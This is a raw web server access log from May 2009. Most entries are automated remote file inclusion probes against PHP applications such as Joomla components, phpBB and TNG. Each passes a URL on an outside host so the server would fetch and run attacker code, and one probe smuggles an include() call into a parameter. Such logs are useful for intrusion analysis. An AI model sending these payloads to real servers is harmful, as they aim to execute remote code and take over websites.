77.222.40.40 - - [23/May/2009:03:46:43 -0400] "GET /logs//?include_path=http://www.rabattguiden.se//templates/beez/css/test.txt?? HTTP/1.1" 200 2495 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1"
77.222.40.40 - - [23/May/2009:03:46:43 -0400] "GET //?include_path=http://www.rabattguiden.se//templates/beez/css/test.txt?? HTTP/1.1" 200 452 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1"
65.23.158.226 - - [23/May/2009:03:46:47 -0400] "GET /logs/access_log.Q108090100//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.4-floor.com/css/z1??? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
77.222.40.40 - - [23/May/2009:03:47:02 -0400] "GET /logs/access_log.Q108052200//historytemplate.php?cms[support]=1&cms[tngpath]=http://vash-ru.net/vipzona/tmp/mawar.txt??????? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
77.222.40.40 - - [23/May/2009:03:47:02 -0400] "GET /logs/access_log.Q108053100//historytemplate.php?cms[support]=1&cms[tngpath]=http://vash-ru.net/vipzona/tmp/mawar.txt??????? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
209.59.12.99 - - [23/May/2009:03:47:17 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
77.222.40.40 - - [23/May/2009:03:47:22 -0400] "GET /logs/access_log.Q108121400%20%20//historytemplate.php?cms[support]=1&cms[tngpath]=http://vash-ru.net/vipzona/tmp/mawar.txt??????? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
77.222.40.40 - - [23/May/2009:03:47:26 -0400] "GET /logs/access_log.Q108121400%20%20//historytemplate.php?cms[support]=1&cms[tngpath]=http://vash-ru.net/vipzona/tmp/mawar.txt??????? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
77.222.40.40 - - [23/May/2009:03:47:27 -0400] "GET /logs/access_log.Q108060800%20%20//historytemplate.php?cms[support]=1&cms[tngpath]=http://vash-ru.net/vipzona/tmp/mawar.txt??????? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
77.222.40.40 - - [23/May/2009:03:47:30 -0400] "GET /logs/access_log.Q108060800%20%20//historytemplate.php?cms[support]=1&cms[tngpath]=http://vash-ru.net/vipzona/tmp/mawar.txt??????? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
81.201.105.162 - - [23/May/2009:03:47:36 -0400] "GET //historytemplate.php?cms[support]=1&cms[tngpath]=http://vash-ru.net/vipzona/tmp/mawar.txt??????? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
81.201.105.162 - - [23/May/2009:03:47:36 -0400] "GET /logs/access_log.Q108121400//historytemplate.php?cms[support]=1&cms[tngpath]=http://vash-ru.net/vipzona/tmp/mawar.txt??????? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
81.201.105.162 - - [23/May/2009:03:47:36 -0400] "GET /logs//historytemplate.php?cms[support]=1&cms[tngpath]=http://vash-ru.net/vipzona/tmp/mawar.txt??????? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
81.201.105.162 - - [23/May/2009:03:47:44 -0400] "GET /logs/access_log.Q108121400%20%20//historytemplate.php?cms[support]=1&cms[tngpath]=http://vash-ru.net/vipzona/tmp/mawar.txt??????? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
87.106.135.14 - - [23/May/2009:03:48:05 -0400] "GET /logs/access_log.Q108110900///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 298 "-" "libwww-perl/5.805"
87.106.135.14 - - [23/May/2009:03:48:05 -0400] "GET ///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 271 "-" "libwww-perl/5.805"
87.106.135.14 - - [23/May/2009:03:48:05 -0400] "GET /logs///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.805"
88.191.103.144 - - [23/May/2009:03:48:06 -0400] "GET /logs/access_log.Q108110900///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 298 "-" "libwww-perl/5.825"
88.191.103.144 - - [23/May/2009:03:48:06 -0400] "GET ///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 271 "-" "libwww-perl/5.825"
88.191.103.144 - - [23/May/2009:03:48:06 -0400] "GET /logs///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.825"
66.223.51.15 - - [23/May/2009:03:48:13 -0400] "GET /logs/components/com_jd-wiki/lib/tpl/default/main.php?mosConfig_absolute_path=http://www.szolnokmegye.hu/plugins/p2000_sponsor_manager/fx29id.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
66.223.51.15 - - [23/May/2009:03:48:13 -0400] "GET /logs/access_log.Q109042200%20%20/components/com_jd-wiki/lib/tpl/default/main.php?mosConfig_absolute_path=http://www.szolnokmegye.hu/plugins/p2000_sponsor_manager/fx29id.txt?? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
66.223.51.15 - - [23/May/2009:03:48:13 -0400] "GET /components/com_jd-wiki/lib/tpl/default/main.php?mosConfig_absolute_path=http://www.szolnokmegye.hu/plugins/p2000_sponsor_manager/fx29id.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
88.84.128.40 - - [23/May/2009:03:48:18 -0400] "GET /logs/access_log.Q108110900///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 298 "-" "libwww-perl/5.803"
88.84.128.40 - - [23/May/2009:03:48:20 -0400] "GET ///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 271 "-" "libwww-perl/5.803"
88.84.128.40 - - [23/May/2009:03:48:20 -0400] "GET /logs///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.803"
66.223.51.15 - - [23/May/2009:03:48:32 -0400] "GET /logs/access_log.Q109011600%20%20/components/com_jd-wiki/lib/tpl/default/main.php?mosConfig_absolute_path=http://www.szolnokmegye.hu/plugins/p2000_sponsor_manager/fx29id.txt?? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
77.222.40.40 - - [23/May/2009:03:48:32 -0400] "GET /logs/access_log.Q108052200//historytemplate.php?cms[support]=1&cms[tngpath]=http://vash-ru.net/vipzona/tmp/mawar.txt??????? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
77.222.40.40 - - [23/May/2009:03:48:32 -0400] "GET /logs/access_log.Q108053100//historytemplate.php?cms[support]=1&cms[tngpath]=http://vash-ru.net/vipzona/tmp/mawar.txt??????? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
58.227.193.198 - - [23/May/2009:03:48:38 -0400] "GET /logs/error_log.Q108090500%20%20/?sourcedir=http://www.swedishlegion.se/poll/copyright.txt???? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
58.227.193.198 - - [23/May/2009:03:48:38 -0400] "GET /logs/?sourcedir=http://www.swedishlegion.se/poll/copyright.txt???? HTTP/1.1" 200 2490 "-" "Mozilla/5.0"
58.227.193.198 - - [23/May/2009:03:48:38 -0400] "GET /?sourcedir=http://www.swedishlegion.se/poll/copyright.txt???? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
77.222.40.40 - - [23/May/2009:03:48:40 -0400] "GET /logs/access_log.Q108052200//historytemplate.php?cms[support]=1&cms[tngpath]=http://vash-ru.net/vipzona/tmp/mawar.txt??????? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
77.222.40.40 - - [23/May/2009:03:48:40 -0400] "GET /logs/access_log.Q108053100//historytemplate.php?cms[support]=1&cms[tngpath]=http://vash-ru.net/vipzona/tmp/mawar.txt??????? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
58.227.193.198 - - [23/May/2009:03:48:56 -0400] "GET /logs/access_log.Q108111500%20%20/?sourcedir=http://www.swedishlegion.se/poll/copyright.txt???? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
69.172.92.14 - - [23/May/2009:03:49:12 -0400] "GET /logs/access_log.Q108110900///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 298 "-" "libwww-perl/5.803"
69.172.92.14 - - [23/May/2009:03:49:12 -0400] "GET ///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 271 "-" "libwww-perl/5.803"
69.172.92.14 - - [23/May/2009:03:49:13 -0400] "GET /logs///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.803"
65.23.158.226 - - [23/May/2009:03:49:32 -0400] "GET /logs/access_log.Q108112400//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.4-floor.com/css/z1??? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
195.56.77.54 - - [23/May/2009:03:49:33 -0400] "GET /logs/components/com_jd-wiki/lib/tpl/default/main.php?mosConfig_absolute_path=http://www.szolnokmegye.hu/plugins/p2000_sponsor_manager/fx29id.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
195.56.77.54 - - [23/May/2009:03:49:33 -0400] "GET /components/com_jd-wiki/lib/tpl/default/main.php?mosConfig_absolute_path=http://www.szolnokmegye.hu/plugins/p2000_sponsor_manager/fx29id.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
195.56.77.54 - - [23/May/2009:03:49:33 -0400] "GET /logs/access_log.Q109042200%20%20/components/com_jd-wiki/lib/tpl/default/main.php?mosConfig_absolute_path=http://www.szolnokmegye.hu/plugins/p2000_sponsor_manager/fx29id.txt?? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
218.185.20.88 - - [23/May/2009:03:49:47 -0400] "GET //historytemplate.php?cms[support]=1&cms[tngpath]=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
218.185.20.88 - - [23/May/2009:03:49:47 -0400] "GET /logs//historytemplate.php?cms[support]=1&cms[tngpath]=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
218.185.20.88 - - [23/May/2009:03:49:47 -0400] "GET /logs/access_log.Q108121400//historytemplate.php?cms[support]=1&cms[tngpath]=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
218.185.20.88 - - [23/May/2009:03:49:52 -0400] "GET //historytemplate.php?cms[support]=1&cms[tngpath]=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
218.185.20.88 - - [23/May/2009:03:49:52 -0400] "GET /logs//historytemplate.php?cms[support]=1&cms[tngpath]=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
218.185.20.88 - - [23/May/2009:03:49:52 -0400] "GET /logs/access_log.Q108121400//historytemplate.php?cms[support]=1&cms[tngpath]=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
195.56.77.54 - - [23/May/2009:03:49:54 -0400] "GET /logs/access_log.Q109011600%20%20/components/com_jd-wiki/lib/tpl/default/main.php?mosConfig_absolute_path=http://www.szolnokmegye.hu/plugins/p2000_sponsor_manager/fx29id.txt?? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
218.185.20.88 - - [23/May/2009:03:49:58 -0400] "GET /logs/access_log.Q108060800//historytemplate.php?cms[support]=1&cms[tngpath]=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
81.201.105.162 - - [23/May/2009:03:50:02 -0400] "GET /logs/access_log.Q108060800//historytemplate.php?cms[support]=1&cms[tngpath]=http://vash-ru.net/vipzona/tmp/mawar.txt??????? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
218.185.20.88 - - [23/May/2009:03:50:02 -0400] "GET /logs/access_log.Q108060800//historytemplate.php?cms[support]=1&cms[tngpath]=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
91.205.124.4 - - [23/May/2009:03:50:21 -0400] "GET /robots.txt HTTP/1.1" 404 208 "-" "Yanga WorldSearch Bot v1.1/beta (http://www.yanga.co.uk/)"
91.205.124.4 - - [23/May/2009:03:50:21 -0400] "GET /ACE.html HTTP/1.1" 200 5877 "-" "Yanga WorldSearch Bot v1.1/beta (http://www.yanga.co.uk/)"
65.23.158.226 - - [23/May/2009:03:50:37 -0400] "GET /logs/access_log.Q108112400//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.4-floor.com/css/z1??? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
60.248.89.72 - - [23/May/2009:03:51:09 -0400] "GET /logs/access_log.Q108091400%20%20///vwar/backup/errors.php?error=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.0" 404 251 "-" "Mozilla/5.0"
60.248.89.72 - - [23/May/2009:03:51:10 -0400] "GET /logs///vwar/backup/errors.php?error=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.0" 404 227 "-" "Mozilla/5.0"
208.113.248.144 - - [23/May/2009:03:51:10 -0400] "GET /index.php?sourcedir=http://www.caregrams.com/images/jajer.txt???? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
208.113.248.144 - - [23/May/2009:03:51:10 -0400] "GET /logs/index.php?sourcedir=http://www.caregrams.com/images/jajer.txt???? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
208.113.248.144 - - [23/May/2009:03:51:10 -0400] "GET /logs/access_log.Q108111500/index.php?sourcedir=http://www.caregrams.com/images/jajer.txt???? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
218.185.20.88 - - [23/May/2009:03:51:15 -0400] "GET /logs/access_log.Q108121400%20%20//historytemplate.php?cms[support]=1&cms[tngpath]=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
208.113.248.144 - - [23/May/2009:03:51:15 -0400] "GET /logs/access_log.Q108091100/index.php?sourcedir=http://www.caregrams.com/images/jajer.txt???? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
60.248.89.72 - - [23/May/2009:03:51:15 -0400] "GET ///vwar/backup/errors.php?error=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.0" 404 222 "-" "Mozilla/5.0"
218.185.20.88 - - [23/May/2009:03:51:16 -0400] "GET /logs/access_log.Q108121400%20%20//historytemplate.php?cms[support]=1&cms[tngpath]=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
91.205.124.4 - - [23/May/2009:03:51:18 -0400] "GET /Includes/ HTTP/1.1" 200 220 "-" "Yanga WorldSearch Bot v1.1/beta (http://www.yanga.co.uk/)"
200.32.100.130 - - [23/May/2009:03:51:21 -0400] "GET //modules/agendax/addevent.inc.php?agendax_path=http://cafe9.fileave.com/ID1.txt??? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
200.32.100.130 - - [23/May/2009:03:51:21 -0400] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://cafe9.fileave.com/ID1.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
200.32.100.130 - - [23/May/2009:03:51:21 -0400] "GET /logs/access_log.Q108110900//modules/agendax/addevent.inc.php?agendax_path=http://cafe9.fileave.com/ID1.txt??? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
200.32.100.130 - - [23/May/2009:03:51:40 -0400] "GET /logs/access_log.Q108110400//modules/agendax/addevent.inc.php?agendax_path=http://cafe9.fileave.com/ID1.txt??? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
70.231.236.14 - - [23/May/2009:03:51:40 -0400] "GET /logs//historytemplate.php?cms[support]=1&cms[tngpath]=http://vash-ru.net/vipzona/tmp/mawar.txt??????? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
70.231.236.14 - - [23/May/2009:03:52:00 -0400] "GET /logs/access_log.Q108060800%20%20//historytemplate.php?cms[support]=1&cms[tngpath]=http://vash-ru.net/vipzona/tmp/mawar.txt??????? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
216.17.99.13 - - [23/May/2009:03:52:02 -0400] "GET /logs/access_log.Q109050700//components/com_simpleboard/image_upload.php?sbp=http://abirdseyeviewof.com/files/image/id1.txt? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
208.113.248.144 - - [23/May/2009:03:52:09 -0400] "GET /logs/access_log.Q108111500%20%20/index.php?sourcedir=http://www.caregrams.com/images/jajer.txt???? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
200.32.100.130 - - [23/May/2009:03:52:14 -0400] "GET /logs/access_log.Q108090100//modules/agendax/addevent.inc.php?agendax_path=http://cafe9.fileave.com/ID1.txt??? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
208.113.248.144 - - [23/May/2009:03:52:14 -0400] "GET /logs/access_log.Q108091100%20%20/index.php?sourcedir=http://www.caregrams.com/images/jajer.txt???? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
91.205.124.4 - - [23/May/2009:03:52:13 -0400] "GET /images/ HTTP/1.1" 200 49338 "-" "Yanga WorldSearch Bot v1.1/beta (http://www.yanga.co.uk/)"
209.59.12.99 - - [23/May/2009:03:52:16 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
218.185.20.88 - - [23/May/2009:03:52:39 -0400] "GET /logs/access_log.Q108052200//historytemplate.php?cms[support]=1&cms[tngpath]=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
218.185.20.88 - - [23/May/2009:03:52:39 -0400] "GET /logs/access_log.Q108053100//historytemplate.php?cms[support]=1&cms[tngpath]=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
218.185.20.88 - - [23/May/2009:03:52:41 -0400] "GET /logs/access_log.Q108052200//historytemplate.php?cms[support]=1&cms[tngpath]=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
218.185.20.88 - - [23/May/2009:03:52:41 -0400] "GET /logs/access_log.Q108053100//historytemplate.php?cms[support]=1&cms[tngpath]=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
208.113.248.144 - - [23/May/2009:03:52:46 -0400] "GET //com_virtuemart/export.php?mosConfig_absolute_path=http://www.caregrams.com/images/jajer.txt???? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
208.113.248.144 - - [23/May/2009:03:52:46 -0400] "GET /logs//com_virtuemart/export.php?mosConfig_absolute_path=http://www.caregrams.com/images/jajer.txt???? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
208.113.248.144 - - [23/May/2009:03:52:46 -0400] "GET /logs/access_log.Q109051100//com_virtuemart/export.php?mosConfig_absolute_path=http://www.caregrams.com/images/jajer.txt???? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
91.205.124.4 - - [23/May/2009:03:53:11 -0400] "GET /logs/ HTTP/1.1" 200 2490 "-" "Yanga WorldSearch Bot v1.1/beta (http://www.yanga.co.uk/)"
70.231.236.14 - - [23/May/2009:03:53:14 -0400] "GET /logs//historytemplate.php?cms[support]=1&cms[tngpath]=http://vash-ru.net/vipzona/tmp/mawar.txt??????? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
70.231.236.14 - - [23/May/2009:03:53:18 -0400] "GET //historytemplate.php?cms[support]=1&cms[tngpath]=http://vash-ru.net/vipzona/tmp/mawar.txt??????? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
70.231.236.14 - - [23/May/2009:03:53:19 -0400] "GET /logs/access_log.Q108121400//historytemplate.php?cms[support]=1&cms[tngpath]=http://vash-ru.net/vipzona/tmp/mawar.txt??????? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
70.231.236.14 - - [23/May/2009:03:53:19 -0400] "GET /logs/access_log.Q108060800//historytemplate.php?cms[support]=1&cms[tngpath]=http://vash-ru.net/vipzona/tmp/mawar.txt??????? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
60.248.89.72 - - [23/May/2009:03:53:52 -0400] "GET /logs/access_log.Q108111500%20%20///vwar/backup/errors.php?error=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.0" 404 251 "-" "Mozilla/5.0"
91.205.124.4 - - [23/May/2009:03:54:09 -0400] "GET /scripts/ HTTP/1.1" 200 802 "-" "Yanga WorldSearch Bot v1.1/beta (http://www.yanga.co.uk/)"
208.113.248.144 - - [23/May/2009:03:54:27 -0400] "GET /logs/access_log.Q109051100%20%20//com_virtuemart/export.php?mosConfig_absolute_path=http://www.caregrams.com/images/jajer.txt???? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
208.113.248.144 - - [23/May/2009:03:55:27 -0400] "GET /logs/access_log.Q109050300%20%20//com_virtuemart/export.php?mosConfig_absolute_path=http://www.caregrams.com/images/jajer.txt???? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
200.32.100.130 - - [23/May/2009:03:56:12 -0400] "GET /logs/access_log.Q108110900%20%20//modules/agendax/addevent.inc.php?agendax_path=http://cafe9.fileave.com/ID1.txt??? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
121.173.130.41 - - [23/May/2009:03:56:26 -0400] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
121.173.130.41 - - [23/May/2009:03:56:26 -0400] "GET /logs/access_log.Q109051100%20%20//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
121.173.130.41 - - [23/May/2009:03:56:26 -0400] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
200.32.100.130 - - [23/May/2009:03:56:34 -0400] "GET /logs/access_log.Q108110400%20%20//modules/agendax/addevent.inc.php?agendax_path=http://cafe9.fileave.com/ID1.txt??? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
121.173.130.41 - - [23/May/2009:03:56:44 -0400] "GET /logs/access_log.Q109051200%20%20//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
70.231.236.14 - - [23/May/2009:03:56:56 -0400] "GET /logs/access_log.Q108052200//historytemplate.php?cms[support]=1&cms[tngpath]=http://vash-ru.net/vipzona/tmp/mawar.txt??????? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
81.201.105.162 - - [23/May/2009:03:57:01 -0400] "GET /logs/access_log.Q108053100//historytemplate.php?cms[support]=1&cms[tngpath]=http://vash-ru.net/vipzona/tmp/mawar.txt??????? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
81.201.105.162 - - [23/May/2009:03:57:01 -0400] "GET /logs/access_log.Q108052200//historytemplate.php?cms[support]=1&cms[tngpath]=http://vash-ru.net/vipzona/tmp/mawar.txt??????? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
209.59.12.99 - - [23/May/2009:03:57:17 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
80.55.171.90 - - [23/May/2009:03:57:36 -0400] "GET /logs/access_log.Q108120400//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://motorcrew.co.kr/home/img/kernel/lib/s/id8.txt?????? HTTP/1.1" 404 235 "-" "libwww-perl/5.821"
80.55.171.90 - - [23/May/2009:03:57:36 -0400] "GET /logs//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://motorcrew.co.kr/home/img/kernel/lib/s/id8.txt?????? HTTP/1.1" 404 213 "-" "libwww-perl/5.821"
80.55.171.90 - - [23/May/2009:03:57:36 -0400] "GET //index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://motorcrew.co.kr/home/img/kernel/lib/s/id8.txt?????? HTTP/1.1" 404 208 "-" "libwww-perl/5.821"
80.55.171.90 - - [23/May/2009:03:57:41 -0400] "GET /logs/access_log.Q108091400//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://motorcrew.co.kr/home/img/kernel/lib/s/id8.txt?????? HTTP/1.1" 404 235 "-" "libwww-perl/5.821"
80.55.171.90 - - [23/May/2009:03:57:42 -0400] "GET /logs/access_log.Q108082200//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://motorcrew.co.kr/home/img/kernel/lib/s/id8.txt?????? HTTP/1.1" 404 235 "-" "libwww-perl/5.821"
116.36.213.166 - - [23/May/2009:03:57:42 -0400] "GET /logs/access_log.Q109051100%20%20//include/mail.inc.php?skin_board_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
116.36.213.166 - - [23/May/2009:03:57:53 -0400] "GET /logs/access_log.Q109020600%20%20//include/mail.inc.php?skin_board_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
203.251.81.216 - - [23/May/2009:03:58:33 -0400] "GET /logs//includes/ktedit/toolbar.php?dirDepth=http://www.petitbijouonline.com/debug/fatal1.txt? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
203.251.81.216 - - [23/May/2009:03:58:33 -0400] "GET //includes/ktedit/toolbar.php?dirDepth=http://www.petitbijouonline.com/debug/fatal1.txt? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
203.251.81.216 - - [23/May/2009:03:58:38 -0400] "GET /logs/access_log.Q109031500//includes/ktedit/toolbar.php?dirDepth=http://www.petitbijouonline.com/debug/fatal1.txt? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
195.34.78.110 - - [23/May/2009:03:59:13 -0400] "GET /logs/access_log.Q109050700/include.php?phpbb_root_path=http://www.babywhisperer.com/default/FX29ID1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
195.34.78.110 - - [23/May/2009:03:59:13 -0400] "GET /logs/include.php?phpbb_root_path=http://www.babywhisperer.com/default/FX29ID1.txt?? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
195.34.78.110 - - [23/May/2009:03:59:13 -0400] "GET /include.php?phpbb_root_path=http://www.babywhisperer.com/default/FX29ID1.txt?? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
203.94.155.59 - - [23/May/2009:03:59:14 -0400] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
203.94.155.59 - - [23/May/2009:03:59:14 -0400] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
195.34.78.110 - - [23/May/2009:03:59:15 -0400] "GET /include.php?phpbb_root_path=http://www.babywhisperer.com/default/FX29ID1.txt?? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
195.34.78.110 - - [23/May/2009:03:59:15 -0400] "GET /logs/include.php?phpbb_root_path=http://www.babywhisperer.com/default/FX29ID1.txt?? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
195.34.78.110 - - [23/May/2009:03:59:15 -0400] "GET /logs/access_log.Q109050700/include.php?phpbb_root_path=http://www.babywhisperer.com/default/FX29ID1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
195.34.78.110 - - [23/May/2009:03:59:16 -0400] "GET /include.php?phpbb_root_path=http://www.babywhisperer.com/default/FX29ID1.txt?? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
195.34.78.110 - - [23/May/2009:03:59:16 -0400] "GET /logs/include.php?phpbb_root_path=http://www.babywhisperer.com/default/FX29ID1.txt?? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
